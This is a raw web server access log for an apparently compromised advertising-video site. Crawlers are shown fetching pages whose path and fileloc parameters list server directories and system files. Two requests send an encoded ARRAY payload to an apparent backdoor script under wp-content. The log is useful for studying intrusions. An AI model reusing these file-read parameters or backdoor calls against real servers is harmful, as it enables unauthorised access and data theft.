74.7.227.51 - - [10/Nov/2025:00:25:05 +0000] "GET /72vtg44764.html?path=/var/www/lamphim/data HTTP/1.1" 200 3277 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:25:06 +0000] "GET /112nyr43112.html?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/xmlrpc.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.1" 200 4059 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [10/Nov/2025:00:25:06 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory12/subsystem/devices/memory12/subsystem/devices/memory5/power HTTP/1.1" 200 3395 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:25:07 +0000] "GET /165etim6199.html?path=/var/www/lamphim/data/tmp HTTP/1.1" 200 2969 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
114.119.154.211 - - [10/Nov/2025:00:25:07 +0000] "GET /?products=893386 HTTP/1.1" 200 4544 "https://lamphimquangcao.net/?sitemap201.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
216.73.216.50 - - [10/Nov/2025:00:25:08 +0000] "GET /robots.txt HTTP/1.1" 200 149 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [10/Nov/2025:00:25:10 +0000] "GET /50xagr30890.html?path=/var/www/lamphim/data HTTP/1.1" 200 3277 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
3.208.156.9 - - [10/Nov/2025:00:25:11 +0000] "GET /our-works/tvc-bia-hello/?path=//proc/sys/kernel/usermodehelper HTTP/1.1" 200 2996 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [10/Nov/2025:00:25:12 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory11/subsystem/devices/memory11/subsystem/devices/memory4 HTTP/1.1" 200 3407 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [10/Nov/2025:00:25:12 +0000] "GET /our-works/tv-commercial/tvc-tet-sum-vay?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Farch%2Fnds32%2Finclude%2Fasm%2Ffpuemu.h&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Farch%2Fnds32%2Finclude%2Fasm HTTP/1.1" 200 2965 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [10/Nov/2025:00:25:13 +0000] "GET /72eei31718.html?path=/var/www/lamphim/data HTTP/1.1" 200 3277 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
34.236.185.101 - - [10/Nov/2025:00:25:14 +0000] "GET /our-works/tvc-sjc/?fileloc=//sys/kernel/kexec_crash_size&path=//sys/kernel HTTP/1.1" 200 2616 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.50 - - [10/Nov/2025:00:25:14 +0000] "GET /our-works/tv-commercial/tvc-tet-sum-vay?fileloc=%2F%2Fusr%2Fshare%2Fdoc%2Fpython3-jsonpatch%2Fcopyright&path=%2F%2Fusr%2Fshare%2Fdoc%2Fpython3-jsonpatch HTTP/1.1" 200 3591 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [10/Nov/2025:00:25:14 +0000] "GET /?path=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory15/subsystem/devices/memory15/subsystem/devices/memory4/power HTTP/1.1" 200 3394 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:25:15 +0000] "GET /41tabut11855.html?path=/var/www/lamphim/data/php-bin HTTP/1.1" 200 2695 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [10/Nov/2025:00:25:16 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F3264%2Froot%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Finclude%2Flinux%2Fkmsg_dump.h&path=%2F%2Fproc%2F3264%2Froot%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Finclude%2Flinux HTTP/1.1" 200 3635 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [10/Nov/2025:00:25:16 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory11/subsystem/devices/memory11/subsystem/devices/memory4 HTTP/1.1" 200 3411 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:25:17 +0000] "GET /41tabut11855.html?path=/var/www/lamphim/data/email HTTP/1.1" 200 2691 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
23.21.175.228 - - [10/Nov/2025:00:25:19 +0000] "GET /our-works/tvc-jokky/?path=//var/lib/apache2 HTTP/1.1" 200 3034 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.50 - - [10/Nov/2025:00:25:19 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F3264%2Froot%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Finclude%2Flinux%2Ftimekeeping32.h&path=%2F%2Fproc%2F3264%2Froot%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Finclude%2Flinux HTTP/1.1" 200 2981 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [10/Nov/2025:00:25:20 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory10/subsystem/devices/memory10/subsystem/devices/memory2 HTTP/1.1" 200 3412 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:25:20 +0000] "GET /21dal46535.html?path=/var/www/lamphim/data/php-bin HTTP/1.1" 200 2695 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
54.210.152.179 - - [10/Nov/2025:00:25:21 +0000] "GET /our-works/tvc-bia-hello/?path=//lib/python3/dist-packages/urllib3-1.25.8.egg-info HTTP/1.1" 200 3134 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.50 - - [10/Nov/2025:00:25:22 +0000] "GET /our-works/tv-commercial/tvc-tet-sum-vay?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Farch%2Fparisc%2Finclude%2Fasm%2Fsections.h&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Farch%2Fparisc%2Finclude%2Fasm HTTP/1.1" 200 2917 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [10/Nov/2025:00:25:22 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory11/subsystem/devices/memory11/subsystem/devices/memory5 HTTP/1.1" 200 3411 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:25:23 +0000] "GET /94xrw35998.html?path=/var/www/lamphim/data/php-bin HTTP/1.1" 200 2695 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.79.248.20 - - [10/Nov/2025:00:25:24 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323733373830342p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323733343230342q3862623839363332623866303834666166643263366338663031316636303830222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 504 167 "-" "-"
216.73.216.50 - - [10/Nov/2025:00:25:24 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fself%2Froot%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fdoc%2Flibhtml-parser-perl%2Fexamples%2Fhrefsub&path=%2F%2Fproc%2Fself%2Froot%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fdoc%2Flibhtml-parser-perl%2Fexamples HTTP/1.1" 200 4038 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [10/Nov/2025:00:25:25 +0000] "GET /?path=//sys/bus/node/devices/node0/memory6/subsystem/devices/memory11/node0/cpu0/driver/cpu0/firmware_node HTTP/1.1" 200 3383 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:25:25 +0000] "GET /21dal46535.html?path=/var/www/lamphim/data/tmp HTTP/1.1" 200 2969 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
18.213.240.226 - - [10/Nov/2025:00:25:26 +0000] "GET /our-works/tvc-bia-hello/?path=//lib/python3/dist-packages/urllib3-1.25.8.egg-info HTTP/1.1" 200 3134 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.50 - - [10/Nov/2025:00:25:26 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F3264%2Froot%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Finclude%2Flinux%2Ftransport_class.h&path=%2F%2Fproc%2F3264%2Froot%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Finclude%2Flinux HTTP/1.1" 200 3365 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [10/Nov/2025:00:25:28 +0000] "GET /72vtg44764.html?path=/var/www/lamphim/data/php-bin HTTP/1.1" 200 2695 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [10/Nov/2025:00:25:29 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory11/node0/cpu1/driver/cpu0/firmware_node/power HTTP/1.1" 200 3389 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [10/Nov/2025:00:25:29 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Ftools%2Fperf%2Farch%2Fsparc%2FMakefile&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Ftools%2Fperf%2Farch%2Fsparc HTTP/1.1" 200 2753 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
52.45.92.83 - - [10/Nov/2025:00:25:30 +0000] "GET /our-works/phu-long-corporate-video/?fileloc=//bin/mesg&path=//bin HTTP/1.1" 200 2593 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [10/Nov/2025:00:25:30 +0000] "GET /149ucad5911.html?path=/var/www/lamphim/data HTTP/1.1" 200 3277 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [10/Nov/2025:00:25:31 +0000] "GET /?path=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory10/node0/cpu1/subsystem/drivers/processor/cpu1/firmware_node/physical_node/driver HTTP/1.1" 200 3275 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [10/Nov/2025:00:25:31 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fusr%2Flib%2Fpython3%2Fdist-packages%2Fapport%2F__pycache__%2Fcrashdb.cpython-38.pyc&path=%2F%2Fusr%2Flib%2Fpython3%2Fdist-packages%2Fapport%2F__pycache__ HTTP/1.1" 200 2667 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [10/Nov/2025:00:25:32 +0000] "GET /19hos33371.html?path=/var/www/lamphim/data HTTP/1.1" 200 3277 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [10/Nov/2025:00:25:32 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory11/subsystem/devices/memory11/subsystem/devices/memory4/power HTTP/1.1" 200 3394 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
35.173.18.61 - - [10/Nov/2025:00:25:33 +0000] "GET /our-works/tvc-bia-hello/?fileloc=//lib/systemd/catalog/systemd.de.catalog&path=//lib/systemd/catalog HTTP/1.1" 200 2919 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [10/Nov/2025:00:25:34 +0000] "GET /62ere44270.html?path=/var/www/lamphim/data/tmp HTTP/1.1" 200 2969 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [10/Nov/2025:00:25:34 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory11/subsystem/devices/memory11/subsystem/devices/memory4/power HTTP/1.1" 200 3395 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:25:35 +0000] "GET /50xagr30890.html?path=/var/www/lamphim/data/php-bin HTTP/1.1" 200 2695 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [10/Nov/2025:00:25:35 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory10/subsystem/devices/memory10/subsystem/devices/memory9/power HTTP/1.1" 200 3396 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:25:36 +0000] "GET /284jwcra5480.html?path=/var/www/lamphim/data HTTP/1.1" 200 3277 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
18.206.47.187 - - [10/Nov/2025:00:25:37 +0000] "GET /our-works/tvc-bia-hello/?path=//usr/share/bug/libmagic1 HTTP/1.1" 200 3003 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [10/Nov/2025:00:25:37 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory10/subsystem/devices/memory10/subsystem/devices/memory2/power HTTP/1.1" 200 3396 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:25:38 +0000] "GET /14gvpz10042.html?path=/var/www/lamphim/data/php-bin HTTP/1.1" 200 2695 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [10/Nov/2025:00:25:39 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory11/node0/cpu0/driver/cpu0/firmware_node HTTP/1.1" 200 3383 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:25:39 +0000] "GET /236wlk4300.html?path=/var/www/lamphim/data HTTP/1.1" 200 3277 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [10/Nov/2025:00:25:40 +0000] "GET /our-works/tv-commercial/tvc-tet-sum-vay?fileloc=%2F%2Flib%2Fpython3.9%2Flib2to3%2Fpgen2%2Fgrammar.py&path=%2F%2Flib%2Fpython3.9%2Flib2to3%2Fpgen2 HTTP/1.1" 200 4754 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [10/Nov/2025:00:25:41 +0000] "GET /?path=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory10/node0/cpu1/driver/cpu0/firmware_node HTTP/1.1" 200 3388 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
100.28.133.214 - - [10/Nov/2025:00:25:41 +0000] "GET /our-works/tvc-bia-hello/?path=//usr/share/bug/libmagic1 HTTP/1.1" 200 3003 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [10/Nov/2025:00:25:42 +0000] "GET /149ucad5911.html?path=/var/www/lamphim/data/php-bin HTTP/1.1" 200 2695 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [10/Nov/2025:00:25:42 +0000] "GET /our-works/phim-viral-nestle?path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Fscripts%2Fkconfig%2Ftests HTTP/1.1" 200 3464 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [10/Nov/2025:00:25:43 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory11/subsystem/devices/memory11/subsystem/devices/memory5/power HTTP/1.1" 200 3395 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:25:43 +0000] "GET /19hos33371.html?path=/var/www/lamphim/data/php-bin HTTP/1.1" 200 2695 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [10/Nov/2025:00:25:44 +0000] "GET /?path=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory14/node0/cpu1/driver/cpu0/firmware_node HTTP/1.1" 200 3387 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [10/Nov/2025:00:25:44 +0000] "GET /our-works/tv-commercial/tvc-tet-sum-vay?path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216-generic%2Fdrivers%2Fgpu%2Fdrm%2Fbridge HTTP/1.1" 200 3195 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [10/Nov/2025:00:25:45 +0000] "GET /149ucad5911.html?path=/var/www/lamphim/data/email HTTP/1.1" 200 2691 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
44.205.192.249 - - [10/Nov/2025:00:25:45 +0000] "GET /our-works/tvc-bia-hello/?fileloc=//lib/systemd/catalog/systemd.de.catalog&path=//lib/systemd/catalog HTTP/1.1" 200 2919 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [10/Nov/2025:00:25:46 +0000] "GET /?path=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory15/node0/cpu0/driver/cpu0/firmware_node HTTP/1.1" 200 3381 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.79.248.20 - - [10/Nov/2025:00:25:48 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323733373832382p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323733343232382q3238653434633865613438363435313063666438303165306361383461646662222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 504 167 "-" "-"
74.7.227.51 - - [10/Nov/2025:00:25:48 +0000] "GET /72eei31718.html?path=/var/www/lamphim/data/php-bin HTTP/1.1" 200 2695 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [10/Nov/2025:00:25:48 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fusr%2Flib%2Fmodules%2F5.4.0-214-generic%2Fbuild%2Finclude%2Fconfig%2Fpm%2Fadvanced HTTP/1.1" 200 3014 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [10/Nov/2025:00:25:50 +0000] "GET /?path=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory14/node0/cpu1/driver/cpu1/firmware_node HTTP/1.1" 200 3428 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
52.204.71.8 - - [10/Nov/2025:00:25:51 +0000] "GET /our-works/tvc-lapatie-2/?path=//usr/share/doc/cloud-initramfs-copymods HTTP/1.1" 200 3019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [10/Nov/2025:00:25:51 +0000] "GET /149ucad5911.html?path=/var/www/lamphim/data/tmp HTTP/1.1" 200 2969 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [10/Nov/2025:00:25:52 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Farch%2Fsh%2Foprofile HTTP/1.1" 200 2977 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [10/Nov/2025:00:25:52 +0000] "GET /?path=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory11/node0/cpu1/driver/cpu0/firmware_node HTTP/1.1" 200 3387 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:25:53 +0000] "GET /72eei31718.html?path=/var/www/lamphim/data/tmp HTTP/1.1" 200 2969 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
54.166.104.83 - - [10/Nov/2025:00:25:54 +0000] "GET /our-works/tvc-bia-hello/?path=//sys/module/psmouse/notes HTTP/1.1" 200 3005 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.50 - - [10/Nov/2025:00:25:54 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fthread-self%2Froot%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214-generic%2Ftools%2Fvm HTTP/1.1" 200 3083 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [10/Nov/2025:00:25:55 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory10/node0/cpu0/driver/cpu0/firmware_node HTTP/1.1" 200 3385 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:25:55 +0000] "GET /284jwcra5480.html?path=/var/www/lamphim/data/php-bin HTTP/1.1" 200 2695 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [10/Nov/2025:00:25:56 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory10/node0/cpu1/driver/cpu1/firmware_node HTTP/1.1" 200 3432 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [10/Nov/2025:00:25:56 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fsys%2Fclass%2Fwakeup%2Fwakeup8%2Fdevice%2Fphysical_node%2Ffirmware_node%2Fphysical_node%2Fvirtio2%2Fstatus&path=%2F%2Fsys%2Fclass%2Fwakeup%2Fwakeup8%2Fdevice%2Fphysical_node%2Ffirmware_node%2Fphysical_node%2Fvirtio2 HTTP/1.1" 200 2687 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [10/Nov/2025:00:25:57 +0000] "GET /236wlk4300.html?path=/var/www/lamphim/data/tmp HTTP/1.1" 200 2969 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
50.19.79.213 - - [10/Nov/2025:00:25:57 +0000] "GET /our-works/phu-long-corporate-video/?fileloc=//bin/snapctl&path=//bin HTTP/1.1" 200 2595 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
